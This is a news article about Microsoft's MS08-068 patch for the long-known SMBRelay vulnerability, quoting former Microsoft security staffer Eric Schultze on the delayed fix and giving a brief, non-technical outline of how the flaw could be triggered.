Microsoft patch closes 7-year-old OS hole, expert says

A former Microsoft employee who's now CTO for a patch management firm says an update issued by Microsoft on Tuesday closes a vulnerability that has been exploited for almost seven years and that he first identified while working for the company.

Eric Schultze, who served as a founding member of the Trustworthy Computing team at Microsoft and was a security director for the vendor, says the MS08-068 patch that Microsoft released as part of its monthly Patch Tuesday announcement closes a flaw he first tested at Microsoft in 2001.

“It is important to get this one patched right away because exploit tools are readily available,” says Schultze, even though the patch is rated “important” and not “critical.” (Compare patch management tools)

“Back in 2001 there was an exploit tool released called SMBRelay and a gentleman by the name of Sir Dystic wrote it,” says Schultze, CTO for Shavlik Technologies. “I was at Microsoft and I tested it and said ‘holy crap, this works.’ I addressed it with Microsoft but they buried their head in the sand. But it looks like they may have finally fixed it.”

Tuesday, Schultze again tested the flaw and confirmed that the “MS08-068 patch does address the SMBRelay attack” written by hacker Sir Dystic, from Cult of the Dead Cow, in March 2001.

He chided Microsoft for leaving the hole open for so long on so many versions of the operating system.

“This means that Microsoft has known of this problem since 2001 and was not able to (or chose not to) fix it until now,” Schultze wrote in an e-mail follow-up to an earlier interview. “This also means that working exploit code has been available for all operating systems including Windows NT 4, Windows 2000, XP, Windows Server 2003, Vista and Windows Server 2008.” He goes on to say, “though as Microsoft correctly states, exploitation is severely mitigated on Vista and Windows Server 2008.”

Schultze acknowledges that the Server Message Block (SMB) flaw addressed in MS08-068 has become less of a threat since companies began to fine-tune their firewalls. But the vulnerability, which could allow an attacker to take over a user’s hard drive, is still a threat within a company’s firewalls, he says.

One operating system that the vulnerability affects is Windows XP SP2, which is still widely used on corporate networks.

Key to exploiting the patch is that an attacker’s machine and the target machine are both running NetBios, which lets applications running on different computers communicate over a LAN and today is usually blocked at the corporate firewall. The machines also need to have Windows Server Services running, which is turned on by default in XP and other Windows versions, but is off by default in Vista and Windows Server 2008.

The attacker could send an HTML e-mail or direct the victim to a Web site, either of which would have a specially formed Web page that references in the source code a small image file. The source code would point to a malicious server rather than the image file using a file:// command, an operating system NetBios-like command that is part of the base operating system.